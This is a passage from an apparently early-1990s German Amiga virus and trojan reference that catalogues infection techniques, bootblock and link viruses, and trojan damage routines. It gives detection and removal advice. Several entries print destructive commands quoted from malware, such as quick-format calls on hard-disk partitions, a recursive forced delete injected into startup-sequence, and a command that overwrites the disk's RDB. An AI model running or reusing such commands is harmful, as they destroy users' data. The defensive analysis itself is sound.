  1219.    - LZ-Virus
  1220.       Linkvirus, verlaengert ein File um 400 Bytes
  1221.       testet Hauptversionsnummer der dos.library, falls groesser 34 oder
  1222.       kleiner 33 keine Aktivierung, verbiegt GlobVec 06 = Write
  1223.       linkt sich hinter CodeHunk (meist 1.) und ersetzt z.B. $4e75 = rts
  1224.       durch $6004 = bra.s 4 oder $4eee = jmp durch $60XY
  1225.       Muss deshalb HunkAnzahl nicht veraendern, sondern nur die Anzahl
  1226.       der Langwoerter des befallenen Hunks um $64 erhoehen.
  1227.       Bedingungen fuer ein File:
  1228.       0.LW = $3f3    (ausfuehrbar)
  1229.       1.LW = 0       (keine Resident-Libs zu laden)
  1230.                      (kein Overlay)
  1231.          es wird ein CodeHunk gefunden $3e9
  1232.       der gefundene CodeHunk ist laenger als #1000 Bytes
  1233.       Ursprung:   (Geruecht 14.07.91)
  1234.       SOLL ein LZ-Entpackungsprogramm sein ????   (hab ich nicht)
  1235.       Hinweis: MehrfachLinks an ein File gefunden !!!
  1236.       Hinweis 01.09.92: Ab VT2.44 sollten mehrere LZ-Virus-Links ans glei-
  1237.       che File in einem Durchgang ausgebaut werden. Falls nein, melden Sie
  1238.       sich bitte. Danke
  1239.  
  1240.    - M_CHAT-Trojan   File   Laenge ungepackt: 13492 Bytes
  1241.       Von der Definition kein Virus, da keine Vermehrungsroutine.
  1242.       Keine verbogenen Vektoren.
  1243.       Braucht AmiExpress-Port, sonst Ausgabe (bei mir)
  1244.                 Couldn't create reply port
  1245.       und Programmende.
  1246.       Im lha-Archiv liegt das Programm ungepackt.
  1247.       Durch das Doc-File im lha-Archiv wird ein Taeuschungsversuch unter-
  1248.       nommen:
  1249.  =============================================================================
  1250.  ||   MULTINODE CHAT DOOR VERSION V2.3 [BUGFIXED] FROM PORTAX OF WIBBLE     ||
  1251.  =============================================================================
  1252.  
  1253.  What is it?!
  1254.  ------------
  1255.  Well M_Chat Is a MultiChat Node Door , Quite simple actually.
  1256.  
  1257.  Installation!
  1258.  -------------
  1259.  M_Chat is VERY easy to install!
  1260.  Make sure you have you boards main dir. assigned as BBS:
  1261.  And your doors dir. assigned as: DOORS:
  1262.  Just copy the actual proggie: M_Chat to your DOORS: dir.
  1263.  Add the following line to your BBS:COMMANDS/CUSTOMCOMMANDS or BBS.CMD
  1264.  file like this:
  1265.  
  1266.  ---------------------------cut here!
  1267.  *CHAT     XM010DOORS:M_Chat
  1268.  ---------------------------cut here!
  1269.  
  1270.  This is a great Multi_Node chat door for Amiexpress
  1271.  
  1272.  -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
  1273.  
  1274.  Signed:                                                PORT/\X of W|BBlE
  1275.  =======                                                =================
  1276.  
  1277.  Call Fraxion Pleasure at ++31/45/678452 (16.8k Dual!)
  1278.  
  1279.       Im File ist zu lesen:
  1280.            316d7c7c 2020204d 554c5449 4e4f4445 1m||   MULTINODE
  1281.            20434841 5420444f 4f522056 45525349  CHAT DOOR VERSI
  1282.            4f4e2056 322e3320 1b5b3337 6d5b4255 ON V2.3 .[37m[BU
  1283.            47464958 45445d1b 5b303b33 326d201b GFIXED].[0;32m .
  1284.            5b316d46 524f4d20 1b5b3335 6d504f52 [1mFROM .[35mPOR
  1285.            54415820 4f462057 4942424c 45202020 TAX OF WIBBLE
  1286.            20201b5b 33316d7c 7c001b5b 303b316d   .[31m||..[0;1m
  1287.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1288.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1289.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1290.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d ================
  1291.            3d3d3d3d 3d3d3d3d 3d3d3d3d 3d000000 =============...
  1292.            00001b5b 306d2020 57616974 696e6721 ...[0m  Waiting!
  1293.            21210000 72616d3a 63720000 7700636f !!..ram:cr..w.co
  1294.            70792063 3a666f72 6d617420 72616d3a py c:format ram:
  1295.            66660000 636f7079 20737973 3a737973 ff..copy sys:sys
  1296.            74656d2f 666f726d 61742072 616d3a66 tem/format ram:f
  1297.            66007261 6d3a6666 20647269 76652064 f.ram:ff drive d
  1298.            68303a20 6e616d65 20484148 41484120 h0: name HAHAHA
  1299.            6e6f6963 6f6e7320 71756963 6b203c20 noicons quick <
  1300.            72616d3a 63720000 72616d3a 66662064 ram:cr..ram:ff d
  1301.            72697665 20737973 74656d32 2e303a20 rive system2.0:
  1302.            6e616d65 20484148 41484120 6e6f6963 name HAHAHA noic
  1303.            6f6e7320 71756963 6b203c20 72616d3a ons quick < ram:
  1304.       Schadensverlauf:
  1305.         Nach Programmaufruf wird der format-Befehl mit neuem
  1306.         Namen "ff" nach ram: kopiert. Danach beginnt die Suche
  1307.         nach Partitions-Namen und LWen:
  1308.           dh0:, system2.0:, work:, dh1:, bbs:, df0:, df1:,
  1309.           dh2:, dh3:, dh4:, df2:, HD:, df0:
  1310.         Gefundene LWe werden schnell formatiert mit z.B.:
  1311.           ram:ff drive dh0: name HAHAHA noicons quick
  1312.         D.h. wahrscheinlich koennen Sie mit Disksalv2 ihre Partition
  1313.         retten, da mit dem Parameter quick nur der BB, Root und
  1314.         Bitmap neu geschrieben werden.
  1315.         Am Schluss soll ausgegeben werden:
  1316.                  " Sorry ",0
  1317.                  ", the BBS is not registred",0
  1318.         VT2.57: (26.09.93)
  1319.         Nur loeschen moeglich, da das Teil in das Chat-Prg. eingebaut
  1320.         ist und deshalb nicht durch Ausbau eines Hunks entfernt wer-
  1321.         den kann.
  1322.      Nachtrag 03.94:
  1323.         Von MultiChat ist ein Namensaenderung aufgetaucht.
  1324.         Name: ATX-Chat
  1325.         Laenge: 13492 Bytes
  1326.         Nicht einmal die Texte im File wurden geaendert.
  1327.         Wird von VT erkannt und sollte geloescht werden.
  1328.         Rest siehe oben
  1329.         Doc-File-Auszug:
  1330.             MULTINODE CHAT DOOR VERSION V3.0 FROM TRASH/ANTHROX
  1331.  
  1332.    WELL THIS IS THE NEW 32 MULTICHAT DOOR FROM TRASH/ANTHROX.YOU NEED /X
  1333.                               3.32 OR HIGER.
  1334.         ;....
  1335.  
  1336.    - MAAS-BB-Virus    Warhawk-Clone
  1337.       nur Textaenderung, eine echte Meisterleistung
  1338.       siehe bei Warhawk
  1339.       im BB ist zu lesen:
  1340.                         4d41 41532d45 58544552       MAAS-EXTER
  1341.            4d494e41 544f523a 20544849 53204953 MINATOR: THIS IS
  1342.  
  1343.    - MACK-Trojan  siehe unten bei WAWE-Trojan
  1344.  
  1345.    - MAD  (ForpibClone)  nur Text geaendert  s.o.
  1346.  
  1347.    - MAD II     nur KS1.2, da absoluter DoIo-ROM-Einsprung
  1348.       Cool, DoIo, KickTag, KickCheckSum, im Speicher immer $7FB00
  1349.       im BB sichtbar: MAD II VIRUS is better  usw.
  1350.       Fordert trackdisk.device NICHT
  1351.       Vermehrung: ueber BB
  1352.       Sobald der Inhalt des Zaehlers groesser $D ist, wird in eine
  1353.       DiskStepRoutine verzweigt. Da diese falsch programmiert und somit
  1354.       nicht funktionsfaehig ist, wird nur der Bildschirm dunkel.
  1355.       Hinweis: es existiert ein MAD II, bei dem der MAD-Text mit sinn-
  1356.       losen Buchstabenfolgen (z.B. DAFGderFEHY) ueberschrieben wurde.
  1357.       Wird von VT als MAD II erkannt.
  1358.       Clone: KHOMEINI-Virus s.o.
  1359.  
  1360.    - MAD IIa  wie MAD II nur jetzt Warm fuer Cool und andere Source-
  1361.       Aenderungen z.B. $2a in $2e usw. Ergebnis bleibt gleich
  1362.          (Anfaenger bitte bleibt beim Joystick !!!)
  1363.  
  1364.    - MAD2-TAI2-Virus  BB   Clone  s.o.
  1365.       Text geaendert (rueckwaerts) eine Meisterleistung
  1366.            6c696272 61727900 73696874 20736920 library.siht si
  1367.            65687420 646e6f63 65732073 75726976 eht dnoces suriv
  1368.            20666f20 65687420 72656d61 6c69746e  fo eht remalitn
  1369.            41206e6f 69746172 6f70726f 4320492e A noitaroproC I.
  1370.            412e542e 20202068 74616564 206f7420 A.T.   htaed ot
  1371.            6c6c6120 7372656d 616c2c20 69697269 lla sremal, iiri
  1372.            7620646e 61206969 72697620 7265766f v dna iiriv revo
  1373.            20756f79 20402054 2e412e49 2e204261  uoy @ T.A.I. Ba
  1374.            64206469 736b7320 3a292929 29292929 d disks :)))))))
  1375.  
  1376.  
  1377.    - MAD III  nur KS1.2  Byte-Warrior-Clone  s.o.
  1378.          geaendert:  DASA0.2 in MAD.III
  1379.            4d414400 4949493c 000813fc 000200bf MAD.III<........
  1380.  
  1381.    - MAD IIIB  nur KS1.2  Byte-Warrior-Clone  s.o.
  1382.          geaendert:  DASA0.2 in MAD III
  1383.            4d414420 4949493c 000813fc 000200bf MAD III<........
  1384.          Der Unterschied ist 00 zu 20 .
  1385.          Desweiteren scheint unklar gewesen zu sein, dass es sich
  1386.          bei DASA0.2 nicht um einen Text, sondern um eine Befehlsfolge
  1387.          handelt.
  1388.  
  1389.    - MAD IV  LamerAltClone  s.o.
  1390.          Unterschied: statt mit Lamer! soll der zerstoerte Block mit MAD
  1391.                       gefuellt werden.
  1392.  
  1393.    - MAFIA-Virus  BB   Dotty-Clone  s.o.
  1394.  
  1395.    - MagiCall  es ist KEIN Virus  wird deshalb von VT nicht erkannt
  1396.       Es ist ein MagiCall (Laenge: 149664) aufgetaucht,
  1397.       an das am Anfang ein einfacher Hunk (mit Namen) angehaengt wur-
  1398.       de. Wenn Sie MagiCall aus dem Cli starten, passiert nichts.
  1399.       Starten Sie dagegen mit dem Icon, so beschwert sich MagiCall mit
  1400.       DisplayAlert ueber die falsche Hunkanzahl. Das Programm selbst
  1401.       enthaelt nach meiner Meinung keinen Virus.
  1402.  
  1403.  
  1404.    - MagicWB-Gag   File
  1405.       KEIN Virus
  1406.       KEINE verbogenen Vektoren
  1407.       KEINE Vermehrung
  1408.       Empfehlung: Loeschen
  1409.       Filename: in s: mti.data  Laenge: 88585 Bytes
  1410.       Es handelt sich um einen UNDOKUMENTIERTEN Gag, der NICHT bei jedem
  1411.       Bootvorgang aktiviert wird.
  1412.       Selbst in verschiedenen Netzen wurde ein Virus vermutet !!!
  1413.       ----- Ausriss -------
  1414.       Ich hab da ein kleine Virenprob, glaub ich !!
  1415.       In unregelmaeszigen Abstaenden erscheint beim Hochfahren des Rechners
  1416.       eine Grafik und Sound, danach Absturz des Rechners, beim erneuten
  1417.       Hochfahren wieder alles roger.
  1418.       Vielleicht kennt einer das Teil:
  1419.           Merkmale: Grafik ein Dreieck und Dolby Surround (THX) mit
  1420.           ^^^^^^^^  Soundunterstuetzung.
  1421.       Kein Virenscanner konnte einen Virus entdecken !! In welchem
  1422.       Programm steckt der drin ??
  1423.       Ich bin dankbar fuer jeden Hinweis, denn das nervt auf die Dauer !!
  1424.       ----- Ausriss-Ende ------
  1425.       Die verschiedenen Anfrager konnten beruhigt werden.
  1426.       ABER !!!!
  1427.       Haben die Programmierer darueber nachgedacht, welchen Schreck ein
  1428.       Anfaenger bekommt. Die Anfaenger haben wahrscheinlich KEIN Modem.
  1429.       Wer hilft diesen Personen ?????
  1430.  
  1431.    - MakroTroj-BEOL5      Text und Icon
  1432.          Namensbegruendung: Im Ram wird ein File BEOL5 angelegt
  1433.          Verbogene Vektoren: nein
  1434.          Resetfest: Nein
  1435.        Ablauf:
  1436.          Ueber das Icon wird Multiview aufgerufen. Es wird ein Text
  1437.          angezeigt, der 3 Gadgets enthaelt. Diese Gadgets erhalte ich
  1438.          nur, wenn ich Multiview von WB3.1 verwende. Arbeite ich mit
  1439.          Multiview von WB3.0, dann werden bei mir die Gadgets nicht an-
  1440.          gezeigt. Klicken Sie auf eines dieser Gadgets, so wird die
  1441.          startup-sequence (im Ram:BEOL5) geaendert.
  1442.          startup vorher:
  1443.           ; $VER: Startup-Sequence_HD 40.4 (31.8.93)
  1444.                ;.....
  1445.          startup nachher:
  1446.           delete >NIL: (#?virus#?|#?vt#?) ALL FORCE QUIET
  1447.           echo I am a perverse teeny-fucker, I am not worth living!
  1448.           ; $VER: Startup-Sequence_HD 40.4 (31.8.93)
  1449.                ;.....
  1450.          Beim naechsten Reset werden alle Programme UND Dirs geloescht,
  1451.          die die Zeichenabfolge (s.o.) enthalten. Danach wird ein Text
  1452.          im Cli ausgegeben.
  1453.          VT sollte das Ausloesefile und die Veraenderung in der startup-
  1454.          sequence erkennen und Loeschen oder Ausbau anbieten. Sie koennen
  1455.          die Zeilen in der Startup-sequence natuerlich auch mit einem
  1456.          Editor ihrer Wahl ausschneiden.
  1457.  
  1458.  
  1459.    - MALLANDER VIRUS V1.0  BB  Block 0-3  auch KS2.04, braucht 1Mb Chip
  1460.          entgegen anderen Behauptungen: laeuft AUCH mit KS1.3 !!!
  1461.          KickTag, KickCheckSum, DoIo, immer ab 7F800
  1462.          anderer Name: DERK    ist 2x im BB zu lesen
  1463.          fordert trackdisk.device NICHT
  1464.          holt 4 Bloecke:
  1465.          Block 0 u. 1 = Virus
  1466.          Block 2 u. 3 = OrigBB  nicht codiert
  1467.          Vermehrung und Schaeden:
  1468.          speichert 4 Blocke ab, d.h. ein File das Block 2 u. 3 belegt,
  1469.          wird zerstoert.
  1470.          belegt immer $4000 ChipSpeicher neu
  1471.          sobald kein Chip mehr frei:
  1472.          decodiert einen BB-Teil mit  eori.w #$aaaa,(a0)+
  1473.          (auch intuition.library) und gibt den Text mit DisplayAlert aus.
  1474.          Danach Reset = jmp FC0000
  1475.                          J.D. MALLANDER VIRUS V. 1.0
  1476.          I need lots of money - buy my cool pd serie 'action power'
  1477.          Hinweis: es gibt KEINE 2 DERK, sondern einer enthaelt Vektoren
  1478.          von KS1.3, der andere von KS2.04 (Beweis: VT vergl.).
  1479.  
  1480.    - MASTER-BBS-Trojan  Name uebernommen nicht nachvollziehbar im Speicher
  1481.          Laenge gepackt:  1652 Bytes
  1482.          Laenge entpackt: 2300 Bytes
  1483.          Keine verbogenen Vektoren
  1484.          Keine Vermehrungsroutine
  1485.          Im entpackten File ist zu lesen:
  1486.            646f732e 6c696272 61727900 4e494c3a dos.library.NIL:
  1487.            00424253 3a555345 522e4b45 59530042 .BBS:USER.KEYS.B
  1488.            42533a55 5345522e 4b455953 004e494c BS:USER.KEYS.NIL
  1489.            3a004242 533a5553 45522e44 41544100 :.BBS:USER.DATA.
  1490.            4242533a 55534552 2e444154 4100536e BBS:USER.DATA.Sn
  1491.            6f6f7044 6f730041 43500061 63700000 oopDos.ACP.acp..
  1492.            4d414749 43202020 00000000 00000000 MAGIC   ........
  1493.          Gefahr nur fuer Mailbox-Betreiber.
  1494.          Empfehlung loeschen.
  1495.          Soll CONMAN usw. nach $7C000 schreiben.
  1496.          Sucht nach SnoopDos
  1497.          Sucht nach ACP-task (acp auch) Nein dann Ende
  1498.          Schreibt in USER.DATA und USER.KEYS Teile des eigenen Files
  1499.          mit MAGIC usw. . Wahrscheinlich eine Zugangsberechtigung.
  1500.      Clone 07.01.94: Filename Master-Who  Laenge: 4844 Bytes
  1501.          mitgelieferter Doc-Auszug:
  1502.                         *****************************
  1503.                         *                           *
  1504.                         *      MASTER-WHO V1.1      *
  1505.                         *                           *
  1506.                         *****************************
  1507.   Featuring
  1508.   ---------
  1509.   -Automatically determines how many nodes are running (up to 9 nodes).
  1510.   -Shows Node number , Name , Location and Action.
  1511.   -The fastest who door available (100% 68000 Assembler).
  1512.   -The shortest who door available.
  1513.   -Tracks even loss of carriers.
  1514.   -Show full action in your Kickstart workbench 1.3 2.0
  1515.   -Show download files
  1516.        usw.
  1517.          In Wirklichkeit ist es ein Master-BBS-Trojan. Wurde mit
  1518.          4eb9-4ef9-Link an ein NUTZLOSES Programm angebracht. Von der
  1519.          Nutzlosigkeit koennen Sie sich selbst ueberzeugen, wenn Sie
  1520.          im Filerequester den 1.Hunk abschalten.
  1521.          VT bietet deshalb nur loeschen an.
  1522.  
  1523.    - MAX  BB       SCA-Clone  s.u.
  1524.  
  1525.    - Maxsafe  Trojan
  1526.          Verbogene Vektoren: keine
  1527.          Nicht Resetfest
  1528.          Archivname: MAXSAFE.LHA  13065 Bytes
  1529.          Filename: maxsafe         5008 Bytes
  1530.          nach readme:   
  1531.         Max door control is a program I wrote about a year ago to help
  1532.         me  sort out bugs in max, It uses the maxpacker.library and monitors
  1533.         all functions called by max, It creates an out put text file
  1534.         showing you any possible problems with any function 34 door.
  1535.          Notwendige libs: hbasic2.lib, hisoftbasic.lib und maxpacker.lib
  1536.          (die wird mitgeliefert und ist in Wirklichkeit eine pp.lib)
  1537.          Ohne diese Libs Abbruch ohne Schadensfunktion.
  1538.          Ablauf:
  1539.          In Ram: werden vier Files erzeugt:
  1540.            runit            9012 Bytes
  1541.            runit.info        338 Bytes
  1542.            YES                 1 Byte
  1543.            YES.info          338 Bytes
  1544.           Hinweis: runit ist in Wirklichkeit ein Nutzprg. (ReadRDB v05.)
  1545.                    und wird hier nur fuer eine Zerstoerungsfunktion miss-
  1546.                    braucht.
  1547.          Weiterhin wird s/startup-sequence geoeffnet.
  1548.          Nach einigen Sekunden wird OHNE Reset ausgefuehrt:
  1549.            execute ram:runit < ram:yes d scsi.device
  1550.          Dies ist die eigentliche Schadensfunktion.
  1551.          Der Inhalt der startup-sequence wird ab Block 0 in den Rigid-
  1552.          Bereich der Unit 0 geschrieben. Der Rest des Rigidbereichs
  1553.          wurde bei mir mit Nullen aufgefuellt.
  1554.          Es sind nur UNIT 0 (1 keine Veraenderung) und nur Festplatten,
  1555.          die mit scsi.device angesprochen werden, betroffen (also z.B.
  1556.          keine Zerstoerung bei gvpscsi.device).
  1557.          vorher:
  1558.          pZyl 0 Bl      0  RDSK-Bl ChS: ok
  1559.          00: 5244534b 00000040 334d4846 00000007 RDSK...@3MHF....
  1560.          10: 00000200 00000012 ffffffff 00000001 ................
  1561.          nachher:
  1562.          pZyl 0 Bl      0
  1563.          00: 0a3b2053 74617274 75702d53 65717565 .; Startup-Seque
  1564.          10: 6e636520 666f7220 68617264 20647269 nce for hard dri
  1565.          Hinweis: Vielleicht sollten Sie doch einmal darueber nachdenken,
  1566.          den Rigid-Bereich Ihrer Festplatte mit VT/zeigeZyl/backup oder
  1567.          einem anderen Tool auf eine DISK (nur da ist es sinnvoll) zu
  1568.          sichern. Kopieren sie dann bitte auch den mount-Befehl und ein
  1569.          mountfile auf diese Disk.
  1570.  
  1571.    - MaxStarL.-Virus   Bootblock
  1572.        Verbogene Vektoren: KickTag, DoIo, GetMes, DisplayAlert
  1573.        KS 40.063: Ja
  1574.        Fordert trackdisk.device NICHT
  1575.        Schreibt immer DOS0-BB
  1576.        Versucht einen sauberen BB vorzuzeigen.
  1577.        Grosser Teil des BB.s codiert. Das Codierbyte aendert sich mit
  1578.        jedem Schreiben.
  1579.        Decodiert mit eor.b d0,(a0)+ ist im Speicher zu lesen:
  1580.           08085468 65204d61 78206f66 20537461 ..The Max of Sta
  1581.           724c6967 68742056 69727573 60393300 rLight Virus`93.
  1582.        Vermehrung: BB
  1583.        Schaeden:
  1584.          Ermittelt mit $DFF006 eine Blocknumer. Testet ob dieser Block
  1585.          mit #8 beginnt (also OFS), und schreibt diesen Block dann mit
  1586.          INSANE!! voll. Da ist dann leider NICHTS mehr zu retten.
  1587.          Block:     973
  1588.           0000: 494e5341 4e452121 494e5341 4e452121 INSANE!!INSANE!!
  1589.           0010: 494e5341 4e452121 494e5341 4e452121 INSANE!!INSANE!!
  1590.            usw....
  1591.          Bei Tests mit DF1: wurde mehrmals (nachvollziehbar KS2.04)
  1592.          nicht ein Block gefuellt, sondern ein ganzer Track unlesbar.
  1593.  
  1594.  
  1595.  
  1596.    - MCA      siehe Claas Abraham
  1597.  
  1598.    - MegaLink    Link   verlaengert ein File um 1044 Bytes
  1599.          Es wird ein neuer erster Hunk erzeugt ($FD) .
  1600.          KEINE verbogenen Vektoren.
  1601.          KS1.3  ja
  1602.          KS2.04 ja
  1603.          Mehrfachlinks: nein, da "schon verseucht"-Test
  1604.          Defekte Files: ja   (Hunkstruktur defekt nur loeschen moeglich)
  1605.          Kennt nicht alle Hunktypen.
  1606.          Namensbegruendung:
  1607.           Decodiert mit eori.b #$f,(a1)+ ist im Speicher zu lesen:
  1608.            7379733a 00007379 733a6300 646f732e sys:..sys:c.dos.
  1609.            6c696272 61727900 4d656761 4c494e4b library.MegaLINK
  1610.          Vermehrung:
  1611.           Da keine Vektoren verbogen werden, muessen Sie ein verseuchtes
  1612.           Prg. starten und dieses Prg. versucht dann EINE Vermehrung.
  1613.           Beispiel: sie booten von der Festplatte und starten dann ein
  1614.           verseuchtes Prg. von DF0: . Das Linkteil wird dann versuchen,
  1615.           auf ihrer Festplatte (sys:) ein Prg. zu verseuchen. Wenn dies
  1616.           nun ein Befehl in sys:c ist, der beim Booten immer aufgerufen
  1617.           wird, so wird jedes Mal ein Vermehrungsversuch unternommen.
  1618.           Fuer die Vermehrung werden DosBefehle (info, examine, exnext
  1619.           usw.) verwendet. Ein Mehrfachlink duerfte nicht moeglich sein,
  1620.           da auf ein Langwort getestet wird. Die Nachbehandlungsroutine
  1621.           ist aufs Byte genau, mit ALLEN Fehlern von CCCP uebernommen.
  1622.           Deshalb koennen defekte Files entstehen.
  1623.          Vermehrungsbedingungen:
  1624.           File ausfuehrbar ($3f3)
  1625.           Filelaenge max. #15000 ($3a98)
  1626.           Disk validated  ($52)
  1627.           Auf der Disk sind noch mind. 8 Bloecke frei.
  1628.        Fileerkennung mit VT getestet : 16.11.93
  1629.        Ausbau mit VT getestet :        16.11.93
  1630.  
  1631.    - MEGAMASTER
  1632.       Cool, DoIo, immer $7e300
  1633.       zwei codierte Bereiche im BB
  1634.       1. Bereich: eori.b #-$45,(a0)+   ; testet auf andere Viren
  1635.       2. Bereich: eori.b #-$11,(a0)+   ; Textausgabe ueber Graphik
  1636.                schwarzer Hintergrund, rote Schrift
  1637.                         Surprise!!!
  1638.                Your Amiga is controlled by
  1639.                         MEGAMASTER
  1640.      Vermehrung: ueber BB
  1641.  
  1642.    - MegaMon   siehe bei PP-Bomb
  1643.  
  1644.    - MeGaSUXX.TXT   siehe bei Elien-Trojan
  1645.  
  1646.    - members.exe   siehe bei IconD-Trojan
  1647.  
  1648.    - MemCheck v8.1  File anderer Name: Liberator virus v1.21
  1649.          gepackt (PP): 6492 Bytes   ungepackt: 10936 Bytes
  1650.          nicht resident
  1651.          nach Aufruf erfolgt Textausgabe: MEMORY CLEAR usw.
  1652.          mit SnoopDos kann man feststellen, dass :
  1653.             - versucht wird Sys:.FastDir zu oeffnen
  1654.             - Test ob MemCheck schon in Root
  1655.             - versucht wird startup-sequence zu oeffnen
  1656.                falls ja Eintrag in erste Zeile:
  1657.                   MemCheck s
  1658.          Weiterhin ist im File zu lesen:
  1659.             Hello from the Liberator virus v1.21
  1660.             Lets play trash the harddisk
  1661.             I`m outta here, kiss mine you lamer!
  1662.  
  1663.             DH0: , BLVC   usw.
  1664.  
  1665.          Mit Festplatte:
  1666.          Es wird ein File .FastDir im Root-Verz. angelegt. Sobald im
  1667.          File der Wert $f erreicht ist, erfolgt die Textausgabe (s.o.)
  1668.          und der Computer stellt die Arbeit ein. Kreset wird not-
  1669.          wendig.
  1670.  
  1671.    - MemSearcher-Virus  BB    $6c, $80,  immer ab $7EC00
  1672.          Eine Speicherlupe bis $80000 im BB
  1673.          Da keine Vermehrung eigentlich von der Definition her kein
  1674.          Virus. Aber auf Grund der verbogenen Vektoren dringende Loesch-
  1675.          empfehlung.
  1676.  
  1677.    - MENEM'S REVENGE   Link  LoadSeg
  1678.       Haengt 2 Hunks (ist neu) an. Hunk 1 = $3E9 = CodeHunk
  1679.                                    Hunk 2 = $3EA = DataHunk
  1680.       Typ A:
  1681.       Verlaengert ein befallenes File um #3076 Bytes.
  1682.       Typ B: (PIF-Virus)
  1683.       Verlaengert ein befallenes File um #3124 Bytes.
  1684.       Auch mit KS2.04
  1685.       Korrigiert dos.library mit SumLib.
  1686.       Ueberlaeuft $3E8-, $3F0- und $3F1-Hunks.
  1687.       Erzeugt einen Prozess mit Namen: " ",0 . Nach meiner Meinung
  1688.       ist der Kopf des 1. Segments von " " FALSCH.
  1689.       Wird ein schon befallenes File danach befallenen, so wird mit
  1690.       FindTask ueberprueft, ob der Prozessname schon da ist.
  1691.       Linkbedingungen:
  1692.       File kleiner als #60000
  1693.       Erster CodeHunk enthaelt folgende Bytefolge NICHT:
  1694.          $286A0164 $700C4E095   (vgl. WB1.3 in c  ask  usw.)
  1695.       Linkablauf:
  1696.       Sie starten ein Programm. Menem "merkt" sich dieses Prg..
  1697.       Sie starten ein neues Prg.. Jetzt erst linkt sich Menem an das
  1698.       alte Prg. Nachweis fuer Nicht-Ass-Benutzer mit SnoopDos.
  1699.       Linkergebnisse mit KS1.3:
  1700.       - gelinktes File ausfuehrbar      (auch libs usw.)
  1701.       - gelinktes File NICHT ausfuehrbar   (Hunks des OrigFiles nicht
  1702.           richtig behandelt, File bringt GURU)
  1703.       - File enthaelt nur noch Datenmuell  (keine Rettung moeglich)
  1704.       Unter KS2.04 entstehen weniger defekte Files. 
  1705.       Mit timer.device werden sechs Systemzeiten abgefragt.
  1706.       Textausgabe dann mit DisplayAlert.
  1707.       Dafuer wird ein Virusprogrammteil mit  asr.l #1,d0  decodiert.
  1708.             dc.b 0,$50,$10,"MENEM'S REVENGE HAS ARRIVED !!!"
  1709.                 dc.b 0,1,0,"  ARGENTINA STILL ALIVE",0,0
  1710.       Hinweis: VT setzt LoadSeg zurueck, schreibt einige RTS in den
  1711.          Speicher, entfernt den Prozess " " auf Wunsch. Sie MUESSEN
  1712.          allerdings mit einem GURU rechnen !!!!
  1713.       Hinweis2: Bei den Datenmuellfiles kann VT NICHT mehr helfen. Fuer
  1714.          Ausbauversuche bei den anderen Filetypen verwenden Sie bitte
  1715.          eine Kopie der verseuchten Disk. VT versucht auch, die
  1716.          "falschen Hunks" wieder zu berichtigen.
  1717.       Hinweis3: Bedenken Sie bitte, dass inzwischen einige Programme
  1718.          auf dem Markt sind, die Loadseg verbiegen. Wurde Menems VORHER
  1719.          gestartet, so wird er "zugedeckt", bleibt ABER AKTIV !!!!!!
  1720.          Koennen Sie z.B. mit Snoopdos nachvollziehen.
  1721.          Meine Empfehlung: keine Programme verwenden, die LoadSeg patchen.
  1722.  
  1723.    - merry BBS-Trojan          File   Laenge ungepackt: 60356 Bytes
  1724.          Zerstoerungsprg. gegen BBS gerichtet.
  1725.          Keine verbogenen Vektoren
  1726.          3-fach $4EB9-$4EF9-Link
  1727.          KS2.04 bei mir kein Intro
  1728.          68000  bei mir kein Intro
  1729.          68030+KS1.3  Kefrens-Intro und versuchter BBS-Zugriff. Braucht
  1730.          powerpacker.lib und explode.lib .
  1731.          VT bietet nur loeschen an.
  1732.  
  1733.    - MessAngel-Inst.   File
  1734.          Keine verbogenen Vektoren, da nur RESET zugelassen wird.
  1735.          Verwendet Befehle von KS2.04, z.B. ColdReset
  1736.          Anderer Name: ELENI!-Inst.
  1737.          Laenge gepackt:   1808 Bytes
  1738.          Laenge ungepackt: 7100 Bytes
  1739.          Im entpackten File ist zu lesen:
  1740.             61727900 00000000 7379733a 42007379 ary.....sys:B.sy
  1741.             733a732f 73746172 7475702d 73657175 s:s/startup-sequ
  1742.             656e6365 009b333b 33326d4d 65737341 ence..3;32mMessA
  1743.             6e67656c 206b696c 6c657220 62792044 ngel killer by D
  1744.             6f636b65 72206f66 20547769 7374210a ocker of Twist!.
  1745.             9b303b33 316d9b34 43436865 636b696e .0;31m.4CCheckin
  1746.             67207374 61727475 702d7365 7175656e g startup-sequen
  1747.             63652e2e 2e0a0a9b 35435649 52555320 ce......5CVIRUS
  1748.             464f554e 4420414e 44205245 4d4f5645 FOUND AND REMOVE
  1749.             44212121 0a0a9b34 43526967 68742074 D!!!...4CRight t
  1750.             6f206469 7361626c 65206672 6f6d206d o disable from m
  1751.             656d6f72 79210a9b 34432d2d 2d2d2d2d emory!..4C------
  1752.          Das Teil behauptet also im Cli, ein MessAngel-Viruskiller zu
  1753.          sein. In Wirklichkeit wird im Rootverzeichnis ein File mit
  1754.          dem Namen B abgespeichert.
  1755.          In der startup-sequence wird am Anfang "B",0a eingetragen.
  1756.          Abgespeichert werden IMMER #5000 Bytes. War Ihre startup-
  1757.          sequence laenger, so verlieren Sie Zeilen. War Ihre start-
  1758.          up-sequence kuerzer, so wird der Rest mit 0 aufgefuellt.
  1759.          Beim Loeschen der 1.Zeile in der startup-sequence kann es
  1760.          dann vorkommen, dass Ihr editor meldet "file contains bin-
  1761.          ary" und die Arbeit verweigert. Sie muessen dann auf einen
  1762.          anderen Editor ausweichen.
  1763.          Das Programm koennen Sie nur mit der r.MT = Reset verlassen.
  1764.  
  1765.    - MessAngel-B-Virus   File
  1766.          Laenge: 1504 Bytes  (immer ungepackt)
  1767.          Anderer Name: ELENI!-B-Virus
  1768.          Filename im Rootverzeichnis: B
  1769.          Wenn Cool-Vektor noch nicht verbogen, dann veraendere Cool-
  1770.          Vektor und dann ColdReset (KS2.04). Durch das Booten wird
  1771.          der MessAngel.BB-Virus geschrieben (s.u.)
  1772.          Das Teil wird immer aufgerufen, da es ja in der startup-
  1773.          sequence liegt.
  1774.          Falls Cool schon verbogen, dann verbogene Vektoren:
  1775.          Cool, DoIo, LoadSeg
  1776.          Das File besteht nur aus einem BB-Code, in dem mit $6000000E
  1777.          eingesprungen wird.
  1778.  
  1779.    - MessAngel.BB-Virus
  1780.          Verbogenen Vektoren: Cool, DoIo, LoadSeg
  1781.          Anderer Name: ELENI!.BB
